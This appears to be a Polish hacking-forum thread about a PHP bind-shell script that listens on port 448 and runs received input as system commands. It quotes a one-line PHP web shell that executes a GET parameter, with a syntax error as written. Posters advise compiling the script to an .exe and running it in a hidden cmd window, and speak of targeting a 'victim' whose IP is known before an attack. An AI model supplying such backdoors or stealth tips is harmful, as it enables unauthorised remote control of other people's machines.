F3nix pisze:Fajne i proste jak tak rzucam na to okiem. Brakuje moim zdaniem pewnej rzeczy. Wydaje mi się, że większość serwerów domyślnie ma ustawione wykonywanie pliku PHP na 30 sekund. Przydałoby się dodać:
Parametr to liczba sekund wykonania skryptu. Zero ustawia na nieskończone wykonanie skryptu (aż do przerwania go w przeglądarce www).
masz racje, jednak u mnie jest to domyslnie ustawione na no limit(w configu php), wiec nie musze tego deklarowac w kazdym skrypcie. Ale oczywiscie zapomnialem tego wspomniec
.
F3nix pisze:
Naprawdę dobry skrypt do edukacji innych, jednak mam pewną wątpliwość czy nie łatwiej nie korzystać z socketów i zrobić po prostu:
Kod: Zaznacz cały
<?php
if ($_GET['cmd'])
exec($_GET['cmd'];
?>
Mozna GETem ale wtedy konieczna jest odpalona przegladarka internetowa. Moj skrypt dziala rowniez z poziomu konsoli(jak uruchomisz trybem konsolowym skrypt). Dla lepszego efektu mozna nawet skompilowac go do .exe(np. bambompile) i odpalic w trybie niewidzialnego okna cmd
. Moze napisze tutorial o tym dla potomnych.
F3nix pisze:
Nie znam za dobrze PHP ale skoro tutaj jest adres IP i PORT to czy ja dobrze rozumiem że ten socket łączy się z nami (192.168.10.151) bo dalej rozumiem jak komunikacja przebiega? Bo jeśli tak jest to jest to tzn. reverse_tcp czyli ofiara łączy się z nami. Lepiej zrobić bind_tcp czyli, że oczekuje na połączenia od osób i jak ktoś się połączy (np: za pomocą zwykłego netcat lub telnet na tym porcie 448 to oddaje mu do usług cmd). Może Cię zainteresuje jeszcze to (jest film):
http://haker.edu.pl/2015/10/26/php-curl-upload-pliku/
Jeśli tak nie jest i jest to adres IP serwera to można je dynamicznie sobie pobrać:
Dzięki za skrypt!
Oh tutaj troche moja niechlujnosc. To jest moj stary skrypt wiec postanowilem sie nim podzielic nie myslalem za bardzo o komentowaniu i wyjasnianiu o co chodzi(moj blad). Skrypt dziala właśnie jako bind-tcp. Dokladnie dziala jak napisales oczekuje na polaczenie na danym porcie (w tym wypadku 448) i po otrzymaniu go udostepnia nam konsole a mowiac precyzyjniej kazdwy wyslany pakiet jest trimowany i wpisywany jako polecenie konsoli.
Adres IP to poprostu adres servera ktory nasluchuje. I tutaj jeszcze raz moj blad, testowalem to na swoich komputerach i wtedy nawet o tym nie pomyslalem. Oczywiscie trzeba dynamicznie pobierac(chyba, ze znasz ip ofiary przed atakiem), gdzies w mojej bardziej zaawansowanej wersji tego skryptu obslugujacej multiwatkowosc wszystko to popoprawialem, moze sie kiedys podziele nim rowniez
.
Z wielka checia przyjze sie temu artykulowi, z curclem mialem troche doczynienia ale nigdy jakos na dluzsza mete sie nie zajmowalem, dzieki
.